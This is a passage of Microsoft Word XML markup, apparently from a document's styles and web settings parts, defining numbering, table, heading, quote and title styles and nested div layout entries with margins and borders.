    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList312211">
    <w:name w:val="No List312211"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1112311">
    <w:name w:val="No List1112311"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2112211">
    <w:name w:val="WW8Num2112211"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11112211">
    <w:name w:val="No List11112211"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2112211">
    <w:name w:val="No List2112211"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList411111">
    <w:name w:val="No List411111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2211111">
    <w:name w:val="WW8Num2211111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11211111">
    <w:name w:val="No List11211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2211111">
    <w:name w:val="No List2211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList12111111">
    <w:name w:val="No List12111111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList31111111">
    <w:name w:val="No List31111111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num211111111">
    <w:name w:val="WW8Num211111111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1111111111">
    <w:name w:val="No List1111111111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList211111111">
    <w:name w:val="No List211111111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1311111">
    <w:name w:val="No List1311111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList3211111">
    <w:name w:val="No List3211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num21211111">
    <w:name w:val="WW8Num21211111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList21211111">
    <w:name w:val="No List21211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList111211111">
    <w:name w:val="No List111211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList61111">
    <w:name w:val="No List61111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num241111">
    <w:name w:val="WW8Num241111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList141111">
    <w:name w:val="No List141111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList241111">
    <w:name w:val="No List241111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList331111">
    <w:name w:val="No List331111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1141111">
    <w:name w:val="No List1141111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2131111">
    <w:name w:val="WW8Num2131111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11131111">
    <w:name w:val="No List11131111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2131111">
    <w:name w:val="No List2131111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList42111">
    <w:name w:val="No List42111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1231111">
    <w:name w:val="No List1231111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num222111">
    <w:name w:val="WW8Num222111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1122111">
    <w:name w:val="No List1122111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList222111">
    <w:name w:val="No List222111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList3131111">
    <w:name w:val="No List3131111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num21131111">
    <w:name w:val="WW8Num21131111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1212111">
    <w:name w:val="No List1212111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList21131111">
    <w:name w:val="No List21131111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList3112111">
    <w:name w:val="No List3112111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList111131111">
    <w:name w:val="No List111131111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num21112111">
    <w:name w:val="WW8Num21112111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList111112111">
    <w:name w:val="No List111112111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList21112111">
    <w:name w:val="No List21112111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList511111">
    <w:name w:val="No List511111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList132111">
    <w:name w:val="No List132111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2311111">
    <w:name w:val="WW8Num2311111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11311111">
    <w:name w:val="No List11311111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2311111">
    <w:name w:val="No List2311111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList322111">
    <w:name w:val="No List322111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num2122111">
    <w:name w:val="WW8Num2122111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList12211111">
    <w:name w:val="No List12211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList2122111">
    <w:name w:val="No List2122111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList31211111">
    <w:name w:val="No List31211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList11122111">
    <w:name w:val="No List11122111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="WW8Num211211111">
    <w:name w:val="WW8Num211211111"/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1111211111">
    <w:name w:val="No List1111211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList211211111">
    <w:name w:val="No List211211111"/>
    <w:next w:val="NoList"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BE7112"/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00BE7112"/>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Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="QuoteChar"/>
    <w:uiPriority w:val="29"/>
    <w:qFormat/>
    <w:rsid w:val="00A87275"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="864" w:right="864"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00A87275"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="0063211C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid2">
    <w:name w:val="Table Grid2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00FF3A72"/>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6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:semiHidden/>
    <w:rsid w:val="0067018A"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0067018A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading8"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="0067018A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0067018A"/>
    <w:pPr>
      <w:spacing w:line="283" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:color w:val="000000"/>
      <w:kern w:val="28"/>
      <w:sz w:val="96"/>
      <w:szCs w:val="96"/>
      <w14:ligatures w14:val="standard"/>
      <w14:cntxtAlts/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0067018A"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria"/>
      <w:color w:val="000000"/>
      <w:kern w:val="28"/>
      <w:sz w:val="96"/>
      <w:szCs w:val="96"/>
      <w14:ligatures w14:val="standard"/>
      <w14:cntxtAlts/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Notes">
    <w:name w:val="Notes"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0067018A"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="288" w:hanging="288"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
      <w:color w:val="000000"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Subhead1">
    <w:name w:val="Subhead 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="BodyText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0067018A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid3">
    <w:name w:val="Table Grid3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0069420F"/>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7330E8"/>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53077F"/>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404C60"/>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4D5164"/>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39"/>
    <w:rsid w:val="00ED2B66"/>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FC1FA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6639">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="3094879">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="8606658">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="10962512">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="12076018">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="13042719">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="637033115">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="120"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="635067811">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1413353671">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1685594706">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="120"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1694381976">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1909800853">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="18051504">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19164649">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19165618">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2065449193">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="277"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2081752171">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="360"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="936668349">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
